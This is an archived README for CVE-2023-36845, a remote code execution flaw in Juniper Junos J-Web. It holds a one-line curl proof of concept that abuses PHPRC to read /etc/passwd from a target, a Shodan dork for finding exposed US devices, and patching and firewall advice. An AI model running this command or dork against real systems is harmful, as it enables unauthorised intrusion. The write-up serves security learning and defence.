Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-36845 PoC — Junos OS: EX and SRX Series: A PHP vulnerability in J-Web allows an unauthenticated to control an important environment

Source
https://github.com/functionofpwnosec/CVE-2023-36845
Associated Vulnerability
Title:Junos OS: EX and SRX Series: A PHP vulnerability in J-Web allows an unauthenticated to control an important environment variable (CVE-2023-36845)
Description:A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to remotely execute code. Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code. This issue affects Juniper Networks Junos OS on EX Series and SRX Series: * All versions prior to 20.4R3-S9; * 21.1 versions 21.1R1 and later; * 21.2 versions prior to 21.2R3-S7; * 21.3 versions prior to 21.3R3-S5; * 21.4 versions prior to 21.4R3-S5; * 22.1 versions prior to 22.1R3-S4; * 22.2 versions prior to 22.2R3-S2; * 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; * 22.4 versions prior to 22.4R2-S1, 22.4R3; * 23.2 versions prior to 23.2R1-S1, 23.2R2.
Description
Juniper Networks POC Understanding CVE-2023–36845 Remote Code Execution Exploit and Protection
Readme
> [!NOTE]
> Useful information that users should know, even when skimming content. this content is content to learn not to be abused or on the wrong track, I wrote this article just to solely learn about cybersecurity research, namely becoming a Penetration Tester in dealing with the CVE-2023-36845 vulnerability.

The following is a write-up or explanation of the CVE-2023-36845 vulnerability and how to protect yourself from this vulnerability. 
**Juniper Networks POC Understanding CVE-2023–36845 Remote Code Execution Exploit and Protection**



![alt text](https://i.ibb.co.com/pzXXs4D/Dark-Simple-Future-Linked-In-Banner-1.png)


### Vulnerability Description:
A PHP External Variable Modification vulnerability was discovered in Juniper Networks Junos OS, specifically impacting the EX Series and SRX Series. This vulnerability permits an unauthenticated attacker to remotely execute malicious code. By exploiting this vulnerability through a carefully crafted request, attackers can manipulate the PHP execution environment, facilitating the injection and execution of code.

### Exploiting CVE-2023–36845
Exploiting this vulnerability is as simple as making a crafted request with the PHPRC variable set. The attacker can remotely execute code, thereby compromising the system. A sample Proof of Concept (PoC) command is as follows:
```bash
curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'
```
### How to Protect Your Systems
Protecting your systems from CVE-2023–36845 is of utmost importance. Here are some key steps to safeguard your Juniper Networks Junos OS installations:
 1. **Patch Your System:** Ensure that your Junos OS is updated to a non-vulnerable version. Juniper Networks regularly releases patches and updates to address security concerns.
 1. **Access Control:** Limit access to your Junos OS devices to trusted IP addresses or network segments. This reduces the risk of unauthorized access.
 1. **Firewall Rules:** Implement firewall rules to restrict inbound and outbound traffic to and from your devices.
 1. **Web Application Firewall (WAF):** Deploy a WAF to filter and monitor incoming web traffic, which can help detect and block malicious requests.
 1. **Security Scanning:** Use security scanning tools like Burp Suite to proactively test your systems for vulnerabilities.

### Shodan Dork for CVE-2023–36845
To identify systems susceptible to CVE-2023–36845 using Shodan, you can utilize the following dork:
```c
title:"Juniper" http.favicon.hash:2141724739 country:"US"
```
This dork narrows down the search to Juniper devices with the specified favicon hash in the United States.


### In Conclusion
CVE-2023–36845 is a significant threat to Juniper Networks Junos OS users. Understanding the vulnerability, actively patching your systems, and implementing security measures can help protect your network infrastructure. Staying vigilant is key to mitigating the risks associated with such vulnerabilities in the ever-evolving landscape of cybersecurity.
File Snapshot

 [4.0K]  /data/pocs/0706d07541dde31522d85c7d1d452d18a7b06c2e
├── [1.0K]  LICENSE
├── [3.0K]  README.md
└── [1.4K]  run.py

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →